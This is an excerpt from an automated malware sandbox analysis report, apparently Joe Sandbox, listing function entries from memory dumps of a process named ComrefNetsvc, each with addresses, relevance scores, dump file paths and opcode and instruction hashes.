                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ed280d8bf548b1ec2bf1eddea7bf991774758c8087716a535454162af2e90022
                                                                                  • Instruction ID: d11e0bac64cf69a4f2561041ca4445be6f736db572c015072817ab9761571f08
                                                                                  • Opcode Fuzzy Hash: ed280d8bf548b1ec2bf1eddea7bf991774758c8087716a535454162af2e90022
                                                                                  • Instruction Fuzzy Hash: 0E315E1061EDAB8EE37A829444705747F95EF4130471946FAD0A6CB1FBD82DBA41C381
                                                                                  Function 00007FFD9BE8C742 Relevance: .1, Instructions: 84COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2196129364.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9be80000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c9c2ece12be05adbe1671e673fdc5daf30a099713b312f73e6f4daa5ac75bcf2
                                                                                  • Instruction ID: 9626f6596496df8ef8b84b3a49bbe74aae03431547b1b9bcbbff6e87f093b2af
                                                                                  • Opcode Fuzzy Hash: c9c2ece12be05adbe1671e673fdc5daf30a099713b312f73e6f4daa5ac75bcf2
                                                                                  • Instruction Fuzzy Hash: 7C316910A5ED9A8EE379C2685474570BB91EF43311B1946BAC0AACB1EBC93D7940C381
                                                                                  Function 00007FFD9BE8AEE0 Relevance: .1, Instructions: 81COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2196129364.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9be80000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: f7f6b385b514506dd9fee84b7070a88ea572f8e546bc0a292c3cb3d548f6c3d0
                                                                                  • Instruction ID: 9a25cacc8df4db778c7679b64756787736e77bed8419170f785d59847bed3ed9
                                                                                  • Opcode Fuzzy Hash: f7f6b385b514506dd9fee84b7070a88ea572f8e546bc0a292c3cb3d548f6c3d0
                                                                                  • Instruction Fuzzy Hash: DD219290A0FECE0FE37757B408340747FA49F4221070B56FBD4AD8B0B3E95A5A46A362
                                                                                  Function 00007FFD9BE89140 Relevance: .1, Instructions: 81COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2196129364.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9be80000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 02806f61bcac677ca2ad7ff379d312febdac0c4b173247c8f9acce5a95f16aea
                                                                                  • Instruction ID: 20d1cb77f841c6314cb943cf79c9fea826abbf257a1024666a93fc2a63e94be7
                                                                                  • Opcode Fuzzy Hash: 02806f61bcac677ca2ad7ff379d312febdac0c4b173247c8f9acce5a95f16aea
                                                                                  • Instruction Fuzzy Hash: 4521D335B0DE498FDBA5CF38C8A99B937E1FF59310B1501BAD55EC71B2CA35A8428740
                                                                                  Function 00007FFD9BAA0C25 Relevance: .1, Instructions: 80COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2187996476.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9baa0000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 88769d052da60eeb1b8370ec3331e5049a4c6c7bf9098bd68e7c2201d060947e
                                                                                  • Instruction ID: f199e9aec04532f91f70b4cc4e3ff72356cb7c65c75d3b092f96d39644ef09d7
                                                                                  • Opcode Fuzzy Hash: 88769d052da60eeb1b8370ec3331e5049a4c6c7bf9098bd68e7c2201d060947e
                                                                                  • Instruction Fuzzy Hash: E1212832B0D28E8FE731DBA888652EC7FA1EF51350F1645BBD048CB1E2D97426898765
                                                                                  Function 00007FFD9BE84FBA Relevance: .1, Instructions: 77COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2196129364.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9be80000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 8bc9a31d4678e2126d0a2867bea01320a5f1bf45fe42052d8b705c1769b98be3
                                                                                  • Instruction ID: 461c6f353edccecba41be34b03ad40834648ab2ce4b1de028276dc24874f668e
                                                                                  • Opcode Fuzzy Hash: 8bc9a31d4678e2126d0a2867bea01320a5f1bf45fe42052d8b705c1769b98be3
                                                                                  • Instruction Fuzzy Hash: BC112B72F0AE4E4FE76597A858611E4B7F4EF45321B46017ED06EC71A3DE2969028640
                                                                                  Function 00007FFD9BE89B69 Relevance: .1, Instructions: 71COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2196129364.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9be80000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 157a01cc1f00e0bc12b61cc164e620ac8e2bbdf281793fd1801a444acd502a9d
                                                                                  • Instruction ID: b070fc8f49fad962edd514085bbd66af96a55485edfda8b090d5b290cf8e653c
                                                                                  • Opcode Fuzzy Hash: 157a01cc1f00e0bc12b61cc164e620ac8e2bbdf281793fd1801a444acd502a9d
                                                                                  • Instruction Fuzzy Hash: 6D214A35E1A90D8FDBACDB58C4A5AADB7A1EF58310F0101BDD11EE72A1CE35A9408B00
                                                                                  Function 00007FFD9BE83339 Relevance: .1, Instructions: 71COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2196129364.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9be80000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 29080532a42eb325f2eb3fb6bf1223d943c257b58aab39abd4b3eb6ef4f3287f
                                                                                  • Instruction ID: 0e2bfc6b1886ed51d49594228b1d00385257c10212608eb649d0f85abca9e130
                                                                                  • Opcode Fuzzy Hash: 29080532a42eb325f2eb3fb6bf1223d943c257b58aab39abd4b3eb6ef4f3287f
                                                                                  • Instruction Fuzzy Hash: 20211031E19D5D9FDBA5DF98D8609BCB7B1FF58301F510539E02AE3290DE35A9058B40
                                                                                  Function 00007FFD9BE89B8E Relevance: .1, Instructions: 61COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2196129364.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9be80000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 0db294ff11ba96804ff4b0dfdf36ae4acb6697ef1d3068bf1319bc47a027ba51
                                                                                  • Instruction ID: 5512b0b960e16d30d0ea0a18c4a8fc46b6c9f284a7f7fa4169e7c35a7aa8b0a3
                                                                                  • Opcode Fuzzy Hash: 0db294ff11ba96804ff4b0dfdf36ae4acb6697ef1d3068bf1319bc47a027ba51
                                                                                  • Instruction Fuzzy Hash: D811F635E1990D8FDFACDB58D4A5AACB7B1EF98314F0001BED15EE72A5CE7669408B00
                                                                                  Function 00007FFD9BE88770 Relevance: .1, Instructions: 60COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2196129364.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9be80000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 460171d8ac546c5ec18f329c6421517618eb356139f41a344619bee9800e587f
                                                                                  • Instruction ID: a7beeca2c2b44eeb9a5620bd256df31fd38a30d9211b31b8e1b00ff52581cdf6
                                                                                  • Opcode Fuzzy Hash: 460171d8ac546c5ec18f329c6421517618eb356139f41a344619bee9800e587f
                                                                                  • Instruction Fuzzy Hash: 82114832B0AE4D4FE77095A444255BD37DAEF46301F060579E05ED71A2DD3A79058341
                                                                                  Function 00007FFD9BE8228A Relevance: .1, Instructions: 60COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2196129364.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9be80000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ac468c31e733685d1df97849163e90363a531b37d8b95cf2dc2f375d813b8629
                                                                                  • Instruction ID: eef32bd091d598bfc5fbc6901c2f14c210ce5b509978029cce20b672ed25ca92
                                                                                  • Opcode Fuzzy Hash: ac468c31e733685d1df97849163e90363a531b37d8b95cf2dc2f375d813b8629
                                                                                  • Instruction Fuzzy Hash: D6010431B0AE0E9FE730A6F444691BE36EADF55340F05057ED41BDB2B1ED76AA058381
                                                                                  Function 00007FFD9BE8E7F2 Relevance: .1, Instructions: 58COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2196129364.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9be80000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 1f419985bec255db2162833c262bb08affdf83b0c681ec1c1edad3f6116f2724
                                                                                  • Instruction ID: 6deeaa4f9b3e2e0343b571d18090837599d9090435718e97531a2907982819eb
                                                                                  • Opcode Fuzzy Hash: 1f419985bec255db2162833c262bb08affdf83b0c681ec1c1edad3f6116f2724
                                                                                  • Instruction Fuzzy Hash: 2111BF22A1EF8E4EDBA587A498600ED7BB1EF45300F0A00B7E059D71E2D92A2A058751
                                                                                  Function 00007FFD9BAA2D34 Relevance: .1, Instructions: 55COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2187996476.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9baa0000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c3cde7ffc7676e100aad871ddd4a8d19598b42ca843dfb59473a9161a0ef696a
                                                                                  • Instruction ID: 34a980e2344ea087ba6745db413c549f7e396618752fb407233741f0a6ba0584
                                                                                  • Opcode Fuzzy Hash: c3cde7ffc7676e100aad871ddd4a8d19598b42ca843dfb59473a9161a0ef696a
                                                                                  • Instruction Fuzzy Hash: AE112E30E08A0DCFDB68DF84C494FAD77B1EB58311F16017AD00EE72A5CA75A984CB40
                                                                                  Function 00007FFD9BE88298 Relevance: .1, Instructions: 53COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2196129364.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9be80000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ab194e4da0ef047becd37d40f4ee2ffa320ba046aa95b7ba630a2cdcbdb388ac
                                                                                  • Instruction ID: 94f9a74cd1f4b2e43b6a8a2bf2b6d4a6216263dd9f9c445170b98e6a28a8b012
                                                                                  • Opcode Fuzzy Hash: ab194e4da0ef047becd37d40f4ee2ffa320ba046aa95b7ba630a2cdcbdb388ac
                                                                                  • Instruction Fuzzy Hash: 3F01A11AF0FC5F86F57855E438391BC41486F80320F16257AD62F660E6DC2F2A412382
                                                                                  Function 00007FFD9BAA0C38 Relevance: .1, Instructions: 53COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2187996476.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9baa0000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e7206814940d934a3592c8d536753e5fc6c63c0b2c8d4661d9036a0e83c3e04a
                                                                                  • Instruction ID: bd99497bb5eb191387c4a2c66605a42ca4b536f34f225858957a67df0151b404
                                                                                  • Opcode Fuzzy Hash: e7206814940d934a3592c8d536753e5fc6c63c0b2c8d4661d9036a0e83c3e04a
                                                                                  • Instruction Fuzzy Hash: E011C235A0D68D8FE722DBA8C8502DC7FB1EF42711F0645B7C088DB1A2D57416498794
                                                                                  Function 00007FFD9BAA0C40 Relevance: .0, Instructions: 47COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2187996476.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9baa0000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a20480248bab53707892c6d0fe8b773d4ac46ff004018d5f88033162b1ce6a8f
                                                                                  • Instruction ID: 1c0690a3d71f507c73523403bf3ca68de641f2a37d1d745c61b348a0437010dd
                                                                                  • Opcode Fuzzy Hash: a20480248bab53707892c6d0fe8b773d4ac46ff004018d5f88033162b1ce6a8f
                                                                                  • Instruction Fuzzy Hash: 2401AD35A0E68D8FE722DBA8C8A02DDBFB1EF42310F0645A7D084DB2A2D57466498790
                                                                                  Function 00007FFD9BE84F34 Relevance: .0, Instructions: 45COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2196129364.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9be80000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a42fe189578fcd3584e998c815a94aa2caba4f13b68e2bedeba41d7df529938f
                                                                                  • Instruction ID: 43b9de6fc347ddd727712553520a0c2fb4ef25876667d59295e45fe5dc9c84d6
                                                                                  • Opcode Fuzzy Hash: a42fe189578fcd3584e998c815a94aa2caba4f13b68e2bedeba41d7df529938f
                                                                                  • Instruction Fuzzy Hash: 04F04F30B19D0D5BD764EA98D0A1928B3E5FB88710B118279D02EC3296CE34BD0286C4
                                                                                  Function 00007FFD9BE8B670 Relevance: .0, Instructions: 44COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2196129364.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9be80000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 1ecbf1aaedf95708734c8a5ffb95730e4afde2a25225bf8da99d97cce9e560ed
                                                                                  • Instruction ID: 4846792c66704ce5d2dc630ad3c230fc2d596f612c436cb4d813260e4fc058c2
                                                                                  • Opcode Fuzzy Hash: 1ecbf1aaedf95708734c8a5ffb95730e4afde2a25225bf8da99d97cce9e560ed
                                                                                  • Instruction Fuzzy Hash: 7F017D3120DA4A8FC716CFB8D4F5AE577D0EF02310F1506BEDA16CB2E1C66AA650C781
                                                                                  Function 00007FFD9BE85970 Relevance: .0, Instructions: 44COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2196129364.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9be80000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 70fba6de1ca5037ceaa73263a24d89d466cbd7bb292cf688b1073032d8cff78b
                                                                                  • Instruction ID: d9f1c891e0f4df4605888e865794ed83d29e797dabe40e658a3c55418215718a
                                                                                  • Opcode Fuzzy Hash: 70fba6de1ca5037ceaa73263a24d89d466cbd7bb292cf688b1073032d8cff78b
                                                                                  • Instruction Fuzzy Hash: 66017D3120DA4A8FC706CBB8C4E5AE577D4EF41320F1506BED656CB6D1CA695650C7C1
                                                                                  Function 00007FFD9BAA0C48 Relevance: .0, Instructions: 41COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2187996476.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9baa0000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: fc0a31a39a0a386294f667cf356c2f368cfbcbb856a85310e646d33e707f308c
                                                                                  • Instruction ID: 69e0f873bd6ef64445d4c34c0be1dc5edd140851ecd99cb959c8012929811361
                                                                                  • Opcode Fuzzy Hash: fc0a31a39a0a386294f667cf356c2f368cfbcbb856a85310e646d33e707f308c
                                                                                  • Instruction Fuzzy Hash: 0A019E31A0E38D9FD722DBA8C8902DCBFB1AF02314F1541E7D084DB2A2D5746645C790
                                                                                  Function 00007FFD9BE89E62 Relevance: .0, Instructions: 39COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2196129364.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9be80000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 3531f46b16ee2ba545d790a7c91620a5ee724ad676c4a6f628eba690344d6d47
                                                                                  • Instruction ID: d431cec1e4950beda15d94be8dcb3e3fc88c624038e34c50aa6d5ea6e2ccde8e
                                                                                  • Opcode Fuzzy Hash: 3531f46b16ee2ba545d790a7c91620a5ee724ad676c4a6f628eba690344d6d47
                                                                                  • Instruction Fuzzy Hash: A8F0C23588FAC99FD7228BB088655E53FE8AF43200B1500E6D4A58A0B2C93E56068351
                                                                                  Function 00007FFD9BE8E7CC Relevance: .0, Instructions: 38COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2196129364.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9be80000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 60b544031e5de9911d54a949208d5ae1b8a9d53eb90dd1fce438f3530998795b
                                                                                  • Instruction ID: 610a8a42d4b13c3cc031ed9c6068b7bbbb75f068f5b8628f06bfd4c30761e6ac
                                                                                  • Opcode Fuzzy Hash: 60b544031e5de9911d54a949208d5ae1b8a9d53eb90dd1fce438f3530998795b
                                                                                  • Instruction Fuzzy Hash: 52F01221F2EC0F8EEBA89BD8A8611FD77A5FF48350F550575E02ED21E1DE3625025640
                                                                                  Function 00007FFD9BE84182 Relevance: .0, Instructions: 36COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2196129364.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9be80000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 8f134fad0f750b5a958660e4d04c99189fb1b62a9a558518aa2de741a403ae8d
                                                                                  • Instruction ID: a6596a483514d55de6d48134f7c0b50a35fc62467364bbd679107bc7ab6b0fcd
                                                                                  • Opcode Fuzzy Hash: 8f134fad0f750b5a958660e4d04c99189fb1b62a9a558518aa2de741a403ae8d
                                                                                  • Instruction Fuzzy Hash: B7F0623145EBC99FD7238BB08C225A57FB8EF52214B1901FAD459870A2C93E171AD751
                                                                                  Function 00007FFD9BAA0C50 Relevance: .0, Instructions: 36COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2187996476.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9baa0000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 610aa049984872f08bf7c108adecbaaaf35d375c6d6ce19a0aa75deb8e9f0b95
                                                                                  • Instruction ID: 4833303f8d8529d936ace311f0dd61450373f0c6819815462c1d39b7c7693653
                                                                                  • Opcode Fuzzy Hash: 610aa049984872f08bf7c108adecbaaaf35d375c6d6ce19a0aa75deb8e9f0b95
                                                                                  • Instruction Fuzzy Hash: 2901A230A0E38D9FE721DBA4C8942DDBFB1EF06314F1541E7D484DB2A2D9785644C741
                                                                                  Function 00007FFD9BAA0B77 Relevance: .0, Instructions: 34COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2187996476.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9baa0000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e4615761c401ab7fe9551d7eb21fb0d504568f91104385e58dcb89933ee3cdec
                                                                                  • Instruction ID: 3f98c668be03beb417d13bc8d67ed15cf76139a2b0e60986f21f74314272866b
                                                                                  • Opcode Fuzzy Hash: e4615761c401ab7fe9551d7eb21fb0d504568f91104385e58dcb89933ee3cdec
                                                                                  • Instruction Fuzzy Hash: 9FF0E53524DA49CFD781AB3DDCA44D47F60EF46209B9A19FBC089C7562D210585DCB00
                                                                                  Function 00007FFD9BAA7091 Relevance: .0, Instructions: 34COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2187996476.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9baa0000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d5afdcd6143e9a482d9139cf66f7d9eb5837dd5367b4204540a6c4ce9a3fb5fc
                                                                                  • Instruction ID: a73a9d1707656129ec8a926872f3a1d1db68aed00c961b13def2525ec09e7aa6
                                                                                  • Opcode Fuzzy Hash: d5afdcd6143e9a482d9139cf66f7d9eb5837dd5367b4204540a6c4ce9a3fb5fc
                                                                                  • Instruction Fuzzy Hash: 63F0FF30A5A51F8AEB75EB94C8A4AF872A2EB64301F1145B6C40DD31A1DEB82B858A50
                                                                                  Function 00007FFD9BE8AB5A Relevance: .0, Instructions: 32COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2196129364.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9be80000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 3142b3e778be64921acf7fe6702835306abfbff1fb2793948d4f19bab89fa548
                                                                                  • Instruction ID: 71734367b8f3fe01137f9b1d45cd87d50737716778c158c3e5b9e30a534a231d
                                                                                  • Opcode Fuzzy Hash: 3142b3e778be64921acf7fe6702835306abfbff1fb2793948d4f19bab89fa548
                                                                                  • Instruction Fuzzy Hash: F7F0962260EBCA4FD7229F648CA01A83FE5AF17314B0D5AF6C454CB1E3D6793A15D351
                                                                                  Function 00007FFD9BE88768 Relevance: .0, Instructions: 31COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2196129364.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9be80000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 3bdf66ef8e22fe722c946646ab61c17feba33cb2934b0fa6e9a177e20dfa9210
                                                                                  • Instruction ID: b4fb54af4382bbf221d92fb9e5b8671cf3cd393feb4ce041cd59dbfe494b0bcd
                                                                                  • Opcode Fuzzy Hash: 3bdf66ef8e22fe722c946646ab61c17feba33cb2934b0fa6e9a177e20dfa9210
                                                                                  • Instruction Fuzzy Hash: D9E0E551B1FC1F9AE67821E8186007C004A9B84751B26267AE42FD62E5FCAE6A423395
                                                                                  Function 00007FFD9BAA6FCC Relevance: .0, Instructions: 30COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2187996476.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9baa0000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: aac303a68ed7bcf3e51f9d3c8fc69d4190d184cdeaba3ba31d6b9619de2ec3a5
                                                                                  • Instruction ID: f1dfb834e7441889d5078f2c9ef441b3a6977754dd5a1eb06d545b49acb84726
                                                                                  • Opcode Fuzzy Hash: aac303a68ed7bcf3e51f9d3c8fc69d4190d184cdeaba3ba31d6b9619de2ec3a5
                                                                                  • Instruction Fuzzy Hash: 7DF0F431B0950F8AEB74EB94C8B46F96393DF54300F1241B6C80DD31F1DDA86F454650
                                                                                  Function 00007FFD9BAA5340 Relevance: .0, Instructions: 21COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2187996476.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
